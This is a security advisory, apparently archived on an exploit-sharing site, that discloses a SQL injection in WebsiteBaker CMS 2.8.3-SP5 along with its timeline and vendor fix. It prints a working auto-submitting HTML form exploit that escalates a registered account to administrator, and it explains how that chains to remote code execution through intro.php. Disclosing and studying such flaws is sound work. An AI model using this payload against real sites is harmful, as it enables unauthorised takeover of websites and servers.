exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WebsiteBaker CMS 2.8.3-SP5 SQL Injection

WebsiteBaker CMS 2.8.3-SP5 SQL Injection
Posted Mar 19, 2016
Authored by High-Tech Bridge SA | Site htbridge.com

WebsiteBaker CMS version 2.8.3-SP5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | d8c88cbdb9744e1a26af7b80ce4fe6fe1b5c53888b9441fc5f1c76364d300b27

WebsiteBaker CMS 2.8.3-SP5 SQL Injection

Change Mirror Download
Advisory ID: HTB23296
Product: WebsiteBaker
Vendor: WebsiteBaker Org e.V.
Vulnerable Version(s): 2.8.3-SP5 and probably prior
Tested Version: 2.8.3-SP5
Advisory Publication: February 24, 2016 [without technical details]
Vendor Notification: February 24, 2016
Vendor Patch: February 26, 2016
Public Disclosure: March 18, 2016
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: Critical
CVSSv3 Base Score: 10 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in WebsiteBaker CMS. A remote attacker will be able to read, write or modify arbitrary information in the database, gain complete control over the vulnerable web application and even the entire web server on which the application is hosted.

The vulnerability exists due to insufficient filtration of user-supplied data passed via "language" HTTP POST parameter to "/account/preferences.php" PHP script. A remote authenticated attacker (the registration is open by default) can alter present SQL query, inject and execute arbitrary SQL commands in the application’s database.

Successful exploitation of vulnerability requires that the attacker is registered and authenticated, but the registration is open by default.

The following exploit code will assign administrative privileges to attacker’s account. To reproduce the vulnerability, just login to the website, copy-paste the code below into an empty HTML file and then open it in your browser:


<form action="http://[host]/account/preferences.php" method="post" name="f1">
<input type="hidden" name="display_name" value="username">
<input type="hidden" name="language" value="EN',group_id='1',groups_id='1">
<input type="hidden" name="action" value="details">
<input value="submit" id="btn" type="submit" />
</form><script>document.f1.submit();</script>


We also attract your attention, that website administrator can edit the "intro.php" file and inject arbitrary PHP code into it using the following URL:

http://[host]/admin/pages/intro.php

The injected code will be executed every time the user visits the following page:

http://[host]/pages/intro.php

Giving these circumstances, successful exploitation of SQL injection vulnerability will lead to Remote Code Execution and full compromise not just of the website, but of the entire web server and related environment.


-----------------------------------------------------------------------------------------------

Solution:

Update to WebsiteBaker 2.8.3 SP6 RC3.0

More Information:
http://addon.websitebaker.org/pages/en/browse-add-ons.php?id=06C9F242

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23296 - https://www.htbridge.com/advisory/HTB23296 - SQL Injection and RCE in WebsiteBaker
[2] WebsiteBaker - http://websitebaker.org - WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS).
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close